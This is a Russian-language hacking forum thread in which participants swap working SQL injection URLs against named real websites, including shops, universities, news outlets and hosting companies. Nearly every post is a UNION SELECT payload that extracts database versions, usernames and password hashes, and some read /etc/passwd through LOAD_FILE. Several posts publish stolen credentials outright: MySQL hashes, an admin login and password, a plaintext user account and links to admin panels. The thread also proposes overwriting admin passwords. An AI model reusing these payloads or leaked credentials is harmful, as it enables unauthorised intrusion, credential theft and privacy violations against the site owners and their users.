"Идём" по покупки /инет магазины/
1. http://fixer.com.ua/information/?id=1'3
2. http://www.rosco.ru/cgi-bin/catalog.pl?tip1=20&kod=20CA1437B009'+union+select+1/* /так и не подобрал количество столбцов/
3. http://www.super.com.ua/local/plug-in/a-price/showone.php?groupid=51&id=-18895+union+select+1,2,3,version(),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* /не помню вроде уже вылаживал/
4. http://www.news.tut.kiev.ua/index.php?lang=1&part_id=200&item_id=2&article_id=-9999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16+from+users/* /по статистике посещаемость 10 000 :D /

Всем желаю хорошо провести праздник

http://www.britfilms.tv/index.php?id=-1+union+select+1,version()/*

Вот форум:

http://www.britfilms.tv/forum/

Вот логин:

http://www.britfilms.tv/index.php?id=-1+union+select+1,user()+from+forum_user/*


Вот пароль в md5:

http://www.britfilms.tv/index.php?id=-1+union+select+1,password+from+forum_user/*

(первая моя до конца законченная sql которую я выкладываю).

http://www.dysgenicrecords.com/artist.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,concat(version() ,char(58),user(),char(58),database()),11,12,13,14, 15,16,17ничего не подобрал
http://slim.climaxdesigns.com/tutorial.php?section=slim&id=-1+union+select+1,2,null,4,concat(user,char(58),pas sword)+from+users+limit+0,1/*юзер один, видимо админ. Сейчас ищу админку

http://www.davisvisitor.com/additional.php?id=-1+union+select+1,2,3,version(),5/*

http://www.blankreb.com/studioarticles.php?ID=-1+union+select+1,2,3,version(),5,6,7,8/*

http://www.bizhost.ru/news/podrobno.php?id=-47+union+select+1,2,3,version(),5,6/*
http://www.bizhost.ru/news/podrobno.php?id=-47+union+select+1,2,3,table_name,5,6+from+informat ion_schema.tables/*
http://www.bizhost.ru/news/podrobno.php?id=-47+union+select+1,2,3,column_name,5,6+from+informa tion_schema.tables/*

вывод ппц кривой %)
зы мб выкладывали

http://german.berkeley.edu/people/showprofile.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,versi on(),15,16,17,18,19,20,21,22,23,24,25/*

http://www.ukrnic.com/hosting_info.php?id=-2+UNION+SELECT+1,version(),3/*

http://bitmaster.ru/index.php?id=21+UNION+SELECT+1,2,user(),4/*

http://www.leaderhost.ru/price/content.php?id=-8+union+select+1,2,database(),4,5,6/*

http://new.sweb.ru/news.php?id=-10+union+select+version(),2,3+from+customers/*

http://partytown.ru/music.php?id=-59+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,concat(username,0x3a,password),21+fr om+sys_user/*

http://partytown.ru/music.php?id=-59+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,concat(login,0x3a,password),21+from+ pt_member+limit+7,1/*

http://partytown.ru/music.php?id=-59+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,concat(login,0x3a,password),21+from+ partychat_users+limit+214,1/*

http://partytown.ru/music.php?id=-59+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,concat(username,0x3a,password),21+fr om+forum_user/*

_http://1690.homepagemodules.de/user.php?board=1690&id=-99+union+select+1,2,3,4,5,6,7,8,9,0,11,2,3,4,5,6,7 ,8,9,0,21,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 42/*

сервис бесплатных форумов...вот юзеров не смог найти

_http://rf.andymacht.de/member.php?ID=-99+union+select+1,concat(nick,0x3a,password,0x3a,e mail),3,4,5,6,7,8,9,0,1,12,3,4,5,6,7,8,9,0,1,22,3, 4,5,6,7,8,9,30+from+user/*
так бестолковый скуль

_http://1690.homepagemodules.de/user.php?board=1690&id=-99+union+select+1,2,3,4,5,6,7,8,9,0,11,2,3,4,5,6,7 ,8,9,0,21,2,3,4,5,6,7,8,9,0,concat(name,0x3a,passw ord),2,3,4,5,6,7,8,9,0,1,42+from+forum_user+limit+ 1,1/*
правда пассы генерит сам форум(( спс Хотабычу :)

_http://1690.homepagemodules.de/user.php?board=1690&id=-99+union+select+1,2,3,4,5,6,7,8,9,0,11,2,3,4,5,6,7 ,8,9,0,21,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 42/*
хостинг бесплатных серверов...вот юзеров не смог найти
дык там вроде 5 версия перебирай и смотри таблицы)) вот например forum_user

_http://www.vabank.ua/ru/news/financial_bulletin.html?id=4418%27&fp=21/*

http://www.mp3.nvcom.ru/show_mp3.php?albumid=-1+union+select+1,2,3,4,concat(login,0x3a,password, 0x3a,email),6,7+from+users_download+limit+0,1/*
база юзеров платного mp3-сайта..(login:рass:email)
правда по одному выводится)

http://www.avto.kg/parts.php?p=9&id=-1+union+select+1,concat(username,char(58),user_pas sword)+from+phpbb_users+limit+1,1/*

http://www.zapchasti.chebtz.ru/spisokname.php?id_tov=-1+union+select+1,2,3,4/*

http://astra-comp.ru/order.php?id=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2/*

http://www.soundgroup.ru/comment.php?idold=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12,13,14/*

http://biomedical.rutgers.edu/faculty.php?id=-1+union+select+version(),null,3,4,5,6,7,8,9,10,11, null,13,14,15,16,17,18,19,20/*

http://www.omnigraphics.com/category_view.php?ID=-1+union+select+1,version(),3,4,5/*

http://www.arbeitundalter.at/rf_detail.php?id=-1+union+select+1,2,3,4,5/*

http://iwf.ru/main/top.php?id=-1+union+select+1,2,version(),4/*

http://holiday.ayda.ru/advices.php?id=-1+union+select+1,2,3,version(),5/*

http://www.datacd.ru/faq.php?id=-1+union+select+1,user(),version()/*

http://www.centresh.ru/article.php?id=-1+union+select+1,2,3,4,5,6,7/*

http://www.aoelmon.ru/next.php?id=-1+union+select+convert(user()+using+cp1251)/*


http://www.zhg.ru/town/gallery/fotos.php?id=-1+union+select+1,2,user(),4/*

http://www.rcmgroup.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*


http://www.worstpreviews.com/review.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,user(),31,32,33,34,35,36,37,38,39,40/*

http://www.festival-mironov.ru/news_once.php?id=-1+union+select+1,version(),3,4,5,6,user()/*

MTV.COM
http://videogames1.mtv.com/pages/gamespace/news.php?id=-928393%20union%20select%201,2,3/*

http://www.pharmabort.ru/page.php?id=-1+union+select+1,2,3,user(),password,6,7,8,9,10,11 ,12,13,14,15+from+pharma_admins/*

http://dusanko.net/komentare.php?art=-1+union+select+1,version(),3,4,5,6,7,8,9/*
http://www.auditorium.ru/aud/gost/gost.php?gid=-1+union+select+1,2,3,user(),database(),6,version() ,8,9,10,11,12,13,14,15,16,17,current_date(),19,20, 21,22/*
http://www.mptri.ru/eng/index.php?art=-1+union+select+1,version(),3,4,5/*

http://www.nevanews.com/index.php?art=-1+union+select+1,2,user()/* - есть таблица users

..
http://www.pckrieg.de/news.php?id=-1+union+select+1,table_name,3,4,5,6,7,8+from+INFOR MATION_SCHEMA.TABLES/*

http://www.ewm1.pl/newru/baza/formemail.php?id=-1+union+select+1,concat(login,char(58),pass),3+fro m+user/*

http://www.rolemancer.ru/printfeature.php?artid=-1+union+select+1,2,3,4,5,6,7,8/*

http://www.sti.ru/acter.php?id=-1+union+select+user(),version()/*

http://highpointlowlife.com/webrelease.php?id=-1+union+select+1,2,version(),user(),5,6,7,8/*


http://www.plantgeek.net/article_viewer.php?id=-1+union+select+1,2,version(),user(),5,6,7,8,9,10,1 1,12/*

http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,convert(version()+using+latin1)/*



http://www.cageprisoners.com/page.php?id=-1+union+select+1,user(),password+from+admins/* - логин и пароль(хз как зашифрован).

http://www.cageprisoners.com/admin -вход в админку.

2Grey
я его давно уже ковырял:)
http://www.rolemancer.ru/sections.php?op=listarticles&secid=-69+union+select+1,2,concat(uname,char(58),pass),4+ from+users/* воть ;)

Последние на сегодня:

http://physics.com.ua/news_interest.php?id=-1+union+select+1,user(),3,4,null,null,7,8,version( )/*

http://www.davisvisitor.com/sub.php?id=-1+union+select+1,2,3,4,version(),user()/*


http://www.barspb.ru/galleries.php?id=-1+union+select+user(),2/*

:) :) ;)

http://www.xmlhack.com/read.php?item=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES/*

http://www.linspire.com/linspire_letter_archives.php?id=-40+UNION+SELECT+1,version(),3,4/*

http://m-l.com.ua/issues.php?aid=-689+union+select+1,2,3,4,5,6,7,8,9/*

http://www.microchip.by/info.php?id=-1106+union+select+1,2,3,VERSION(),5/*

http://zvisti.com.ua/info.php?id=-3461+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12+from+INFORMATION_SCHEMA.TABLES/*

http://www.science.oas.org/INFOCYT/info.php?id=-2526+union+select+1,2,3,4,password,6+from+mysql.us er/*

http://www.slavneft.ru/press/info.php?id=-420+union+select+1,2,mail,id,5,6,7,8,9+from+mail/*

http://www.worstpreviews.com/review.php?id=-393+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40/*

http://www.dvdfuture.com/review.php?id=-805+union+select+1,2,concat(user_email,char(58),us er_icq,char(58),user_password),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19+from+phpbb_users+limit+1,1/*

http://planeta.sch2.net/ship/review.php?id=-16+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.derives.net/reviews/review.php?id=-1535+union+select+1,2,3,4,5,6,7,8,9/*

http://www.guitarnoise.com/review.php?id=-375+union+select+1,2,3,4,5,6,7,8/*

http://www.storing-zine.net/review.php?id=-242+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17/*

SWAT, www.partytown.ru // http://www.tsb.kz я уже выкладывал.

SWAT, www.partytown.ru // http://www.tsb.kz я уже выкладывал.

за всем проследить не могу....подправил месагу))

SWAT, да всё нормально) у всех бывает :)

http://www.williams.edu/admin/news/releases.php?id=-1106+UNION+SELECT+1,2,3,4,5,6,concat(username,0x3a ,password),8,9,10,11+from+editors+limit+1,1/*

http://www.williams.edu/admin/news/releases.php?id=-1106+UNION+SELECT+1,2,3,4,5,6,concat(username,0x3a ,password),8,9,10,11+from+editors/*

странно с лимитами получилось, без лимита одно, с лимитом 1,1 другое, лимиты до 50 перебрал - пусто :) ну вообщем вот.

http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,column_name,5,6,7,8,9,10,1 1,12+from+information_schema.columns/*

http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,table_name,5,6,7,8,9,10,11 ,12+from+information_schema.tables/*

посмотрел все таблицы\колонки - ничё дельного.

_http://uptime.ru/content.php?what=preleases&id=-1+UNION+SELECT+1,0x4C4F47494E3A4D7953514C5F6861736 82870617373776F7264293A655F6D61696C,concat(login,c har(58),password,char(58),email),4,5,6,7+from+user s+limit+8541,1/*

какой-то интернет-магазин... :)
http://www.nordiz.ru/tovar.php?tovar_id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,concat(user,0x3a,password), 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7+from+mysql.user+limit+1,1/*
логин и mysql-хеш админа.

ps: 57 столбцов, ужс :)

//upd:

http://www.oxid.ru/mp3/mp3.php?id=-1+union+select+1,concat(login,0x3a,pass,0x3a,email ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+u sers+limit+1,1/*
очередной mp3шник, на этот раз - бесплатный :)
формат данных login:рass:email

&&upd2:
http://www.eventor.ru/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*
название не подобрал =\

Наевеяно n1†R0x
_http://www.globalmoney.ru/affiliate/order.php?tovar_id=-1+union+select+1,concat(login,0x3A,password,0x3A,e mail),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,2,3,4+from+users/*


http://www.qteki.ru/tovar.php?tovar_id=-1+union+select+1,concat(user,0x3A,password),3,4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9+from+mysql.user+limit+1,1/*

109 столбцов))

прикольный такой параметр

http://pda.nordiz.ru/tovar.php?tovar_id=-1+union+select+1,2,3,concat(user,0x3A,password),5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7+from+mysql.user+limit+1,1/*

http://www.merrell.ru/show_item.php?id=-1+union+select+1,version(),3,4/*
правда таблицы с юзерами там вроде как нет :(

http://www.merrell.ru/show_item.php?id=-1+union+select+1,version(),3,4/*
правда таблицы с юзерами там вроде как нет :(
юзеры скуля уже не в счёт? :p
http://www.merrell.ru/show_item.php?id=-1+union+select+1,concat(user,0x3a,password),3,4+fr om+mysql.user/*
http://www.merrell.ru/show_item.php?id=-1+union+select+1,LOAD_FILE(0x2f6574632f70617373776 4),3,4/*

http://www.mebelshop.kiev.ua/tovarBIG.php?tovar=-1+union+select+1,2,3,version(),5,6,user(),database (),9,10/*
http://www.sportshopik.ru/shop.php?GID=-1+union+select+1,2,3,4,5,concat(user(),char(58),ve rsion(),char(58),database())/*
http://www.ezgulik.org/news.php?id=-1+union+select+1,2,version(),user(),5,6/*
http://www.wnqsport.ru/showtext.php?text_id=-1+union+select+1,2,3,4,5,6/*

ещё один на 109, кажись админ один и тотже:

http://www.russiangps.ru/item.php?tovar_id=-1+union+select+1,USER(),3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9/*

ещё парочка.

http://www.argo-shop.com.ua/catalog_total.php?tovar_id=-1+union+select+1,2,USER(),4,5,6,7,8,9/*


http://www.thb-nordis.ru/tovar.php?tovar_id=131+order+by+57/*

юзеры скуля уже не в счёт? :p
http://www.merrell.ru/show_item.php?id=-1+union+select+1,concat(user,0x3a,password),3,4+fr om+mysql.user/*

забыл :D
gz c MoA :)

http://region-press.ru/izd.php?id=-1+union+select+version(),2,3/*

http://www.ksu.ru/tatnews.php?id=-1+union+select+1,null,3,4,user(),6,7,version(),9,1 0,11/*

Газета ТРУД
http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,USER(),VERSION(),5,6,7/*

Газета ТРУД
http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,USER(),VERSION(),5,6,7/*
я выкладывал ;)
http://www.tajima-service.ru/index.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10/*

http://www.stjohns.hk/archive.php?id=-1+union+select+1,2,3,4,version(),6,user()/*

Газета ТРУД я выкладывал за всём не уследишь))
http://www.ezgulik.org/news.php?id=-1+union+select+1,2,USER(),4,5,6/*&status=1

http://net.bible.org/strong.php?id=-1+union+select+version(),null,user(),4,5,6,7,8,9,1 0,11,12/*

http://www.koss.ru/press.php?id=-47+UNION+SELECT+1,2,3,4,5,6--&limit=1

http://mshop.po.pl.ua/phone_view.php?id=-1+UNION+SELECT+1,id,login,4,5,name,id,8,9,10,11,12 ,13,14,15,16,17,18,9,19,20,21+from+u sers/*

2Dagon
а почему бы так не запостить? ;)
http://mshop.po.pl.ua/phone_view.php?id=-1+UNION+SELECT+1,null,null,null,null,null,concat(l ogin,char(58),passw),null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null+FROM +users/*

_http://mobius.com.ua/print_mp3.php?raz=&id=-99+union+select+1,2,3,4,Convert(database()+using+c p1251),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,21,22,23,24/*
нашел только количество столбцов, скуль кажись в utf-8.

http://www.pm-group.com/newsroom/news.php?id=58%20union%20select%201,2,3,concat(use rname,char(58),email,char(58),pass),5,6,7,8,9,10,1 1%20from%20admin/*

http://www.alphaplugins.com/fnews/news.php?id=-72%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24/*

_:)_

http://libweb.anglia.ac.uk/glossary.php?id=-1+union+select+null,null,concat(user,0x203a20,pass word),null+from+mysql.user/* root : *03EFB72ED8A587931B0CEB4D41C593AA3558CF48

libweb : *ED1407E7F2EBDE6147E892938C770F674B7A63FD

staffnet : *E04FBB23BA1A7760CBBFDFBE1A27E9DB1D682162

login_screen : *AB77271A3BF74A173B8E634A03E39719AC00DE01

ebooks : *997636E7EA613370DD35CD809F4C7F6F47005B86

stats : *52DB1A5B33AF08DB2FA808A13457E2C510274574

login_screen3 : 31ca51ec050a74a2

login_screen2 : 453303f84c250289

intranet : *3858D48807349812613074E76D0934B8D05AD904

;)

http://www.nowt2do.co.uk/review.php?id=-420+union+select+1,2/*

http://www.webbusines.com.ru/review.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

http://www.bia2.com/music-review/review.php?id=-233+union+select+1,2,3,4,5,6,7,8,9/*

http://www.storing-zine.net/review.php?id=-106+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17/*

http://www.derives.net/reviews/review.php?id=-1218+union+select+1,2,3,4,5,6,7,8,9/*

http://www.borninblood.co.uk/review.php?id=-32+union+select+1,2,3,4,5,6,7/*

http://xbox360.themanroom.com/game-review.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

http://securities.org.ua/securities_paper/review.php?id=322&pub=-1333+union+select+1,2,3,4,5,6,7,8,9/*

http://www.theatreview.org.nz/reviews/review.php?id=-273+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

http://www.webmasterlead.com/review.php?id=-338+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

http://www.victoryzine.com/review.php?id=-559+union+select+1,2,3,4,5,6,7+from+users/*

http://e-disc.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(e mail,0x3a,pwd),14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28+from+users+limit+17412,1+/*
17412 юзеров) можете мыльники повыдирать, зайти в "кабинет" под чужим юзером не получается..

/upd:
то же самое) даже база одна
http://dvdguru.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(e mail,0x3a,pwd),14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28+from+users+limit+17412,1/*

вот малость нашел, но не разбирал толком
http://www.chillwithme.ca/view_profile.php?member_id
http://www.moshiach.com/explore/kb/index.php?page=search'
http://www.sitecritique.net/critiques/site_directory/cat_listing.php?cat=78'
http://kult.fdvinfo.net/2003/
http://www.voltronik.pl/dziabol/osp/links.php
http://www.abogadogeneral.ipn.mx/avc/agenda/
http://www.revistacanina.com/Criaderos_de/publicidad.php?=1'
http://www.cluj4all.com/index.php?pid=111
http://www.linspect.com/product/linfo'
http://www.pattaya-pattaya.com/dating/
http://ump.pl/de/main.php?cid=poznaj&iid='
http://www.supadance.us/directory/new.php
http://www.atmospheriques.com/artiste.php?id=
http://www.trade.lv/modules/blank.php?tech=1'
http://www.kb-jardin.com/page.php?rub=3&idproduit=42
http://www.i-20.com/exhibition.php?exhibition_id=
http://www.ridiva.lt/xls.php
http://www.tinytoad.com/dkennedy/films.phtml
http://www.themovieinsider.com/db/ebay.php?mid=
http://www.db-central.de/content_manager/page.php?ID=324447
http://www.ideal.de/shops/ideal/front/category_detail.php3?language=l1&cat_id=226'
http://cfors.com/
http://www.mobilevideonet.com/site/index.php?onderdeelID=1&paginaID=1&itemID=28
http://www.progresosemanal.com/friendly.php?pdr=Jan0410_07&progreso=bullets
http://www.cheaptldomains.com/index.php?a=cat&cc=
http://www.programming.hu/banner.php
http://www.dtmp3.com/prydwen/forum/
http://www.apollon.ws/Ima/directory
http://margarida.free.fr/b2/
http://www.emuv2.com/index.php?page=roms
http://74.52.58.98/~apples/site03/recipesall.php
http://www.e-money.od.ua/
http://www.thehostbusters.com/idev/
http://www.saher4.com/sms/
http://server.mhost111.net/~sapi/honor/
http://diabet-news.ru/en/f/
http://www.michaelang.com/projects/
http://infonia.pl/sms/
http://www.ringtones-logos.eu.com/directory/

http://www.agenciapulsar.org/coberturas_det.php?id=-1+union+select+1,version(),user(),4,5,6,7,8/*

пошел значит я почитать про выборы в Питере...
http://www.vybor-spb.ru/area.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(us er,0x3a,password),0x78),0x78),3,4+from+mysql.user/*
вот как у нас хорошо готовятся)

-вырезано-
ошибочка :)

решил слить всё что у меня накопилось =D ужос..
начнём с ЭДУ
http://www.eng.wayne.edu/news.php?id=-99+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,0,1,2,3/*
http://biomedical.rutgers.edu/faculty.php?id=-20+union+select+1,2,3,4,5,6,7,8,9,concat(login,cha r(58),password),11,12,13,14,15,16,17,18,19,20+from +users
admin:tm9537!# - вход в админку справа. Ничё интересного я там не нашёл
http://chaplains.harvard.edu/chaplains/profile.php?id=-1+union+select+1,2,3,4,LOAD_FILE(0x2f6574632f70617 3737764),6,7,8,9,10,11/*
поддомен Гарварда. Находится к сожалению на другом серваке
http://moritzlaw.osu.edu/faculty/bios.php?ID=-99+union+select+1,2,3,password,username,6,7,8,9,10 ,11,12,13,14,15,16,17+from+access
так и не нашёл как попасть в админку. Хотя искал не очень внимательно... =)
http://www.cpd.usu.edu/division.php?id=-99+union+select+1,2,3,4,5,6,table_name,8,9,10+from +information_schema.tables+limit+16,1/*
хз чё там. Сервак на винде
http://www.linfield.edu/humanresources/detail.php?id=-1+union+select+1,2,version(),4,5,6,7,8/*
http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,concat(user,char(58),password),14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42+from+mysql.user/*
http://www.hcs.harvard.edu/~hib/viewannounce.php?ID=-1+union+select+1,2,version(),4,5/*
опять поддомен гарварда и опять другой сервер
http://www.mcli.dist.maricopa.edu/ocotillo/retreat05/demos.php?id=-17+union+select+1,2,3,4,5,6,7,LOAD_FILE('/tmp/preved.php'),9,10,11,12,13,14,15,16,17
Превед
http://www.bu.edu/phpbin/news/releases/display.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,convert(version()+using+latin1)/*
http://www.housing.wisc.edu/resnet/news/story.php?id=-10+union+select+1,2,3,4,5,concat(user,char(58),pas sword),7,8,9,10+from+mysql.user
http://slim.climaxdesigns.com/tutorial.php?section=slim&id=-1+union+select+1,2,null,4,concat(user,char(58),pas sword)+from+users+limit+0,1/*
http://www.cageprisoners.com/page.php?id=-3+union+select+1,2,concat(username,char(58),passwo rd)+from+admins+limit+0,1
http://www.mp3collection.ru/links/cats.php?id=-16+union+select+1,2,3,4,5,6,7,8,concat(name,char(5 8),password),null,11,12,13,14,15,16+from+users+lim it+0,5000/*
без лимита страничка наглухо виснет и негрузится
http://www.labnow.com/product_updates.php?id=-13+union+select+1,concat(user,char(58),password),3 ,4,5,6,7,8,9,10,11,12,13+from+users+limit+0,1
http://www.grivelnorthamerica.com/ambassadors.php?id=-5+union+select+1,user,3,pass,5+from+users
http://www.gooom.com/artists.php?id=-13+union+select+1,mail,3,4,5,6,7,8,9,10,11,12,13+f rom+users
http://www.redbarngarden.com/index.php?id=-3+union+select+concat(username,char(58),passwd,cha r(58),auth),2,3+from+cms_auth
как сказал Грей пароль в SHA-1
http://www.dysgenicrecords.com/artist.php?id=-17+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17
http://www.globelines.com.ph/DataServiceHomeUse.php?id=-10+union+select+1,2,3,4,convert(version()+using+la tin1),6,7,8,9,10

ууух. Ну вот это пока что всё =) ещё где то была скуля в зоне GOV но я потерял =)

http://alx.ultranet.ru/joke_show.php?id=-1+union+select+1,version(),user()/*

http://www.tklenta.ru/articles_txt.php?id=-1+union+select+user(),version()/*

вот от меня скуля ;)
http://lib.prometey.org/?lib=forum&t=-92+union+select+1,concat(user_login,char(58),user_ pass,char(58),user_mail)+FROM+user+limit+10353,1/*
не плохо 10353 юзеров и все пассы в чистом виде :eek:
login:bob
pass:mixail26
сама админка http://lib.prometey.org/admin.php

http://www.intercar.com.ua/index.php?id=-1+union+select+1,2,version(),user(),5,6+from+users/*

http://www.viking.tm/product.php?id=-1+union+select+1,2,3,4,5,6,7/*

http://chugworth.com/comic.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13/*

www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=8'

www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=8'
можно кста вот так: http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,concat(user,0x3a,password),5 ,6,7,8,9,10,11,12+from+mysql.user+limit+0,1/*
&&
http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173 737764),5,6,7,8,9,10,11,12+from+mysql.user/*

http://www.vrijwilligerswerk.be/informatie/informatie.php?id=2+order+by+99
UPDATE
т е можно сделать +union+update+admins+set+password='preved'

http://www.soaw.org/new/sub.php?id=2+order+by+99

http://pride.uoregon.edu/section.php?id=-6+unioN+select+1,2,3,4,5,6

http://www.aglob.ru/books/?id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10/*

http://www.m-study.ru/art/?news_id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11/*

America On-Line
http://nhldraftnet.aol.com/NHLDraftNet/index.php?ID=-20+union+select+1,2,3,CONVErT(version()+using+lati n1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
судя по пути на сервере, сам AOL находится на другом серваке

http://www.wargames.ru/sections.php?op=viewarticle&artid=-1+union+select+1,2,3,4,5,6,concat(name,0x3a,uname, 0x3a,pass),8,9,10,11,12,13+from+users+limit+0,1/*
было или нет, не видел..

http://www.eng.wayne.edu/page.php?id=-1505+union+select+1,2,3,4,5,6/*

http://curious.astro.cornell.edu/question.php?number=-1+union+select+concat(user,0x3a,password),2,3,4,5, 6+from+mysql.user+limit+1,1/*
mysql hash

update

http://www.eng.wayne.edu/page.php?id=-1505+union+select+1,convert(id+using+latin1),3,4,5 ,6+from+users/*

http://www.yuretz.ru/prikol.php?id=471'

http://www.yuretz.ru/prikol.php?id=471'

http://www.yuretz.ru/prikol.php?id=-471+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--

мож кто разбирается в PostgreSQL:

http://www.nne.ru/news.php?id=1658'


Довольно странная там шифровка паролей:

http://www.davinciinstitute.com/page.php?ID='+union+select+1,2,3,TABLE_NAME,5,6+fr om+information_schema.tables+limit+16,1/*
http://www.davinciinstitute.com/page.php?ID='+union+select+1,2,3,concat(Username,0 x3A,Password),5,6+from+Admin+limit+3,1/*


пара слепых вроде:

http://www.fm.gov.lv/page.php?id=-1+union+select+1111111111111111/*
http://daily.com.ua/analytics/page.php?id=32346+union+select+1,2/*

http://www.ricardocabello.com/index.php?postid=-1+union+select+1,2,3,4,5,6,7,8/*
http://pnnonline.org/article.php?sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
если кто-то додумает названия таблиц, буду благодарен) у меня фантазии не хватает уже =\

http://www.proflit.ru/book.php?id=-1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13, 14,15,16,version()/*


Первая на сегодня)))

в mysql.user доступа нет
http://www.rickardliljeberg.com/blog.php?itemID=1+and+1=-1+union+select+1,2,3,4,5,user(),7,8/*

2 Colkru
http://forum.antichat.ru/threadnav21336-85-10.html
пост номер 847 =)
upd//
http://www.iconla.com/gallery.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12 ,13,14,15,16,17+from+INFORMATION_SCHEMA.TABLES+lim it+21,1/*
ничего интересного =\

2 Colkru
http://forum.antichat.ru/threadnav21336-85-10.html
пост номер 847 =)



Сорри, тогда вот 5-ая версия:

http://www.sju.ca/people2.php?id=-1+union+select+1,2,table_name,version(),null,6,7,8 ,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TA BLES+limit+0,1/*

http://www.ittraining.ro/cursuri.php?id=-3+union+select+1,id,3+from+admin
не смог колонки подобрать 0_о

